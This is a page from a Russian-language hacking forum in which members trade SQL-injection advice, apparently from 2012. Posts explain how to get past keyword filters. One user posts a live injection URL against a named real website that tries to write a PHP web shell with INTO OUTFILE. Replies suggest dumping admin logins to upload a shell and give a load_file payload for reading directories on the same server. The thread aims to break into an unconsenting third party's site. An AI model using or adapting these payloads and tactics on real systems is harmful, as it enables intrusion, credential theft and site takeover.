HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20571  
Старый 02.05.2012, 21:49
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от boortyhuhtyu  
есть варианты раскрутить скуль если на серве ssl шифрование и ошибки отключены?
а чем ssl Может мешать твоей скуле?

ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
 
Ответить с цитированием

  #20572  
Старый 02.05.2012, 21:51
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами: 8039126

Репутация: -6


По умолчанию

Цитата:
Сообщение от Konqi  
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)
 
Ответить с цитированием

  #20573  
Старый 03.05.2012, 16:54
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
 
Ответить с цитированием

  #20574  
Старый 03.05.2012, 17:25
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию

Цитата:
Сообщение от d1v  
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
 
Ответить с цитированием

  #20575  
Старый 03.05.2012, 17:28
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от Га-Ноцри  
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из
этой методички.
Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы.
 
Ответить с цитированием

  #20576  
Старый 03.05.2012, 17:32
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию

Цитата:
Сообщение от d1v  
я ведь написал - ЛЮБОЕ наличие оператор приводит к редиректу. все тривиальные методы испробованы.
Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
 
Ответить с цитированием

  #20577  
Старый 04.05.2012, 16:19
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
С нами: 8952260

Репутация: 1
По умолчанию

Пациент:

Fiile_priv Y + доступ к PhpInfo.

Пробовал залить мини-шелл след образом:

Цитата:
Сообщение от None  
http://www.aviel.ru/txt/new.php?id=32270-9.999+union+select+1,'',3,4,5,6,7,8,9,10,11+from+m ysql.user+into+outfile+'/usr/local/www/aviel/www/txt/images/s.php'--
Выдает ошибку:

Цитата:
Сообщение от None  
К сожалению, запрошеннaя Вами статья в настоящее время недоступна.
ЧТо можно с ним сделать?

P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.

P.S1 эх, первый шелл был так близок =((...
 
Ответить с цитированием

  #20578  
Старый 04.05.2012, 16:47
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
 
Ответить с цитированием

  #20579  
Старый 04.05.2012, 18:02
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...

Пример:

Код:
http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
 
Ответить с цитированием

  #20580  
Старый 04.05.2012, 20:37
Cock3r
Новичок
Регистрация: 19.01.2011
Сообщений: 14
С нами: 8059286

Репутация: 0
По умолчанию

как получить список пользователей wordpress?без админки
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.